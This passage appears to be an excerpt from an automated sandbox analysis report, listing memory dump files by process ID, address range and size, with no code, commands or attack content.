memory/5000-225-0x0000000000000000-mapping.dmp
-
memory/5044-142-0x0000000005690000-0x00000000056CC000-memory.dmpFilesize
240KB
-
memory/5044-149-0x0000000006CF0000-0x0000000006D40000-memory.dmpFilesize
320KB
-
memory/5044-144-0x0000000006740000-0x0000000006CE4000-memory.dmpFilesize
5.6MB
-
memory/5044-145-0x0000000005AB0000-0x0000000005B16000-memory.dmpFilesize
408KB
-
memory/5044-146-0x0000000006EC0000-0x0000000007082000-memory.dmpFilesize
1.8MB
-
memory/5044-147-0x00000000075C0000-0x0000000007AEC000-memory.dmpFilesize
5.2MB
-
memory/5044-133-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/5044-132-0x0000000000000000-mapping.dmp
-
memory/5044-148-0x0000000006D70000-0x0000000006DE6000-memory.dmpFilesize
472KB
-
memory/5044-143-0x00000000059A0000-0x0000000005A32000-memory.dmpFilesize
584KB
-
memory/5044-139-0x0000000005B70000-0x0000000006188000-memory.dmpFilesize
6.1MB
-
memory/5044-140-0x00000000056D0000-0x00000000057DA000-memory.dmpFilesize
1.0MB
-
memory/5044-141-0x0000000005600000-0x0000000005612000-memory.dmpFilesize
72KB
-
memory/5100-234-0x0000000000000000-mapping.dmp
-
memory/5112-185-0x0000000000000000-mapping.dmp
-
memory/5308-322-0x00007FF7B9F60000-0x00007FF7BA754000-memory.dmpFilesize
8.0MB
-
memory/5308-321-0x0000021A51B70000-0x0000021A51B90000-memory.dmpFilesize
128KB
-
memory/5308-328-0x00007FF7B9F60000-0x00007FF7BA754000-memory.dmpFilesize
8.0MB
-
memory/5364-327-0x00000000007F0000-0x0000000000B4F000-memory.dmpFilesize
3.4MB
-
memory/5364-325-0x00000000007F0000-0x0000000000B4F000-memory.dmpFilesize
3.4MB
-
memory/5364-330-0x00000000007F0000-0x0000000000B4F000-memory.dmpFilesize
3.4MB
-
memory/5364-326-0x00000000772E0000-0x0000000077483000-memory.dmpFilesize
1.6MB
-
memory/6752-265-0x00007FFDFE5F0000-0x00007FFDFE7E5000-memory.dmpFilesize
2.0MB
-
memory/6752-267-0x00007FF7373F0000-0x00007FF7380E9000-memory.dmpFilesize
13.0MB
-
memory/6752-319-0x00007FF7373F0000-0x00007FF7380E9000-memory.dmpFilesize
13.0MB
-
memory/6752-262-0x00007FF7373F0000-0x00007FF7380E9000-memory.dmpFilesize
13.0MB
-
memory/6752-264-0x00007FF7373F0000-0x00007FF7380E9000-memory.dmpFilesize
13.0MB
-
memory/6752-278-0x00007FFDFE5F0000-0x00007FFDFE7E5000-memory.dmpFilesize
2.0MB
-
memory/6752-266-0x00007FF7373F0000-0x00007FF7380E9000-memory.dmpFilesize
13.0MB
-
memory/6752-320-0x00007FFDFE5F0000-0x00007FFDFE7E5000-memory.dmpFilesize
2.0MB
-
memory/6752-268-0x00007FF7373F0000-0x00007FF7380E9000-memory.dmpFilesize
13.0MB
-
memory/6752-277-0x00007FF7373F0000-0x00007FF7380E9000-memory.dmpFilesize
13.0MB
-
memory/6752-270-0x00007FF7373F0000-0x00007FF7380E9000-memory.dmpFilesize
13.0MB
-
memory/104252-271-0x0000000000000000-mapping.dmp
-
memory/104252-272-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/104252-292-0x0000000007670000-0x000000000768E000-memory.dmpFilesize
120KB